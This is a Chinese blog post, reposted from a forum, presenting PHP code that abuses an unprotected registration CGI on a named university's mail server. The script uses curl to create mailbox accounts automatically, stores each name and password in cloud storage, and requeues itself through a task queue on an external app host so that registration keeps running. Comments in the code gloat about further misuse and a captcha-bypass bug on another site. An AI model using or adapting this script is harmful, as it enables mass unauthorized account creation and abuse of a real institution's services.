又一个EDU邮箱漏洞

继续上次某大学live bug之后,这次某科大也中招了。不说话只贴代码:
http://post.usts.edu.cn/igenus/login.php

 'http://post.usts.edu.cn/cgi-bin/vqregister/vqregister.cgi',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => 'fname='.$name.'&user='.$name.'&dom=post.usts.edu.cn&pass='.$pass.'&vpass='.$pass.'&Register=提交'
    )
);
$content = curl_exec($ch);
$kv = new SaeKV();
$kv->init();
if(curl_errno($ch))
{
    //不操作
}
else
{
    $x = $kv->set('ustsmail_'.$name, $pass);
// 嘿嘿...还能做些什么,自己邮箱给他发个邮件???
//嘿嘿,,....谁知道QQ个人主页有个BUG也是跳过验证码的~ 嘿嘿~


}
curl_close($ch);
$queue = new SaeTaskQueue('list');//此处的test队列需要在在线管理平台事先建好
$queue->addTask("http://1.heihei.sinaapp.com/stu_mail.php");
$queue->push();
?>

转载自http://cloudbbs.org/forum.php?mod=viewthread&tid=2513,我这博客和围脖没什么人看,应该不会流传吧?

又一个EDU邮箱漏洞 没有评论

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据